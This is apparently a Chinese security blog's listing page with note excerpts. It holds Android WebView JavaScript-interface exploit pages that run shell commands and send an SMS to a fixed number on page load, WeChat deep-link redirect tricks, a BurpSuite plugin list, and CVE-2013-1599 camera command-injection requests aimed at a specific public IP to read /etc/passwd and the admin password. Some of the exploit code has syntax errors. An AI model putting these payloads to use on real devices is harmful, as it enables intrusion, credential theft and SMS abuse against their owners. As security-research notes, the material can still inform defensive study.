WeiyiGeek

杂而不纯,不博也不精 | 学不止步,勿忘初心

无标题

http://www.anquan.us/static/bugs/wooyun-2015-0114241.html

    <html>
<body>
<script>
function execute(cmdArgs)
{
return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
var res = execute(["/system/bin/sh", "-c", "ls -al /mnt/sdcard/"]);
document.write(getContents(res.getInputStream()));
</script>
</body>
</html>

这个是执行命令的poc

<html>
<head>
<title>Test send</title>
<script type="text/javascript">
function execute() {
var sendsms = jsInterface.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null),invoke(null,null);
sendsms.sendTextMessage("13722555165",null,"get",null,null);
}
</script>
</head>
<body onload="execute()">
<input type="button" onclick="="execute" value="test"/>
</body>
</html>

<html>
<head>
<title>Test sendsms</title>
<script type="text/javascript">
function execute() {
var sendsms = jsInterface.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null),invoke(null,null);
sendsms.sendTextMessage("13722555165",null,"get",null,null);
}
</script>
</head>
<body onload="execute()">
<input type="button" onclick="="execute" value="test"/>
</body>
</html>

https://www.jianshu.com/p/2c6c55b48238

出售API的
http://vip.wxticket.com/

weixin的协议
weixin://看了官方的文档之后我发现了微信支持如下操作

weixin://dl/general
weixin://dl/favorites 收藏
weixin://dl/scan 扫一扫
weixin://dl/feedback 反馈
weixin://dl/moments 朋友圈
weixin://dl/settings 设置
weixin://dl/notifications 消息通知设置
weixin://dl/chat 聊天设置
weixin://dl/general 通用设置
weixin://dl/officialaccounts 公众号
weixin://dl/games 游戏
weixin://dl/help 帮助
weixin://dl/feedback 反馈
weixin://dl/profile 个人信息
weixin://dl/features 功能插件

经过一番查找我找到了能够跳转的方法
weixin://dl/business/?ticket=xxxxxxxxxxxxxxxxx 打开小xx网站的时候突然弹出的微信是什么鬼

果然是我想象得那样
weixin://dl/business/?ticket=taa597ccdcdf00ecb865d9e04904bbff4
我们手机打开一下我得测试网页
demo
成功打开微信并跳转~~~~

阅读更多
无标题
BurpSuite常用插件

描述:主要记录BurpSuite常用插件的下载地址以及功能;

1.EasyCSRF: https://github.com/0ang3el/EasyCSRF

  • 描述:主要功能检查和发现CSRF漏洞并进行构造请求
    • 1.更改PUT to POST方法多种方法自动测试
    • 2.删除起源头
    • 3.突出显示代理历史中的请求
阅读更多
无标题

SparkLAN网络摄像头

CVE-2013-1599

描述:该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。

多个D-Link网络摄像头产品’/var/www/cgi-bin/rtpd.cgi’存在输入验证漏洞,允许远程攻击者利用漏洞提交类似如下的请求以应用程序上下文执行任意命令:

漏洞证明:

#1.查看/etc/passwd
http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd

#2.获取摄像头密码
http://183.179.253.135/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

参考:https://www.cnvd.org.cn/flaw/show/CNVD-2013-04632

阅读更多
首页 归档 分类 标签 关于 搜索